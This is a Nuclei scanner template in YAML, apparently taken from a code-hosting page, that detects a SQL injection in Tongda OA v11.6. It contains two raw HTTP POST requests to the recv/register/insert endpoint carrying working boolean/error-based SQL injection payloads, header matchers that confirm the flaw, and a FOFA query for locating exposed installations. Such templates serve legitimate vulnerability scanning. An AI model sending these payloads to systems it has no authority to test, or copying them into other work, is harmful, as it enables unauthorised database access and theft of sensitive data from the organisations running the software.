50 lines
1.7 KiB
YAML
Executable File
50 lines
1.7 KiB
YAML
Executable File
id: tongda-insert-sqli
|
|
|
|
info:
|
|
name: Tongda OA v11.6 Insert Parameter - SQL Injection
|
|
author: SleepingBag945
|
|
severity: high
|
|
description: |
|
|
Tongda OA v11.6 insert parameters contain SQL injection vulnerabilities, through which attackers can obtain sensitive database information
|
|
reference:
|
|
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.6%20insert%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
|
|
classification:
|
|
cpe: cpe:2.3:a:tongda2000:office_anywhere:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: tongda2000
|
|
product: office_anywhere
|
|
fofa-query: app="TDXK-通达OA"
|
|
tags: tongda,sqli,intrusive
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /general/document/index.php/recv/register/insert HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))<128,1,710)))# =1&_SERVER=
|
|
- |
|
|
POST /general/document/index.php/recv/register/insert HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))>128,1,710)))# =1&_SERVER=
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: header_1
|
|
words:
|
|
- "PHPSESSID="
|
|
- "register_for/?rid="
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header_2
|
|
words:
|
|
- "register_for/?rid="
|
|
negative: true
|
|
# digest: 490a0046304402201eb9aff3e9dbeedeabd249bd947f23dfeeb2800c10474f1ab608195057445eca02203e1dccb03dda47cd4181689138fb160810a667eda9e799d541e1c5e923277e29:922c64590222798bb761d5b6d8e72950 |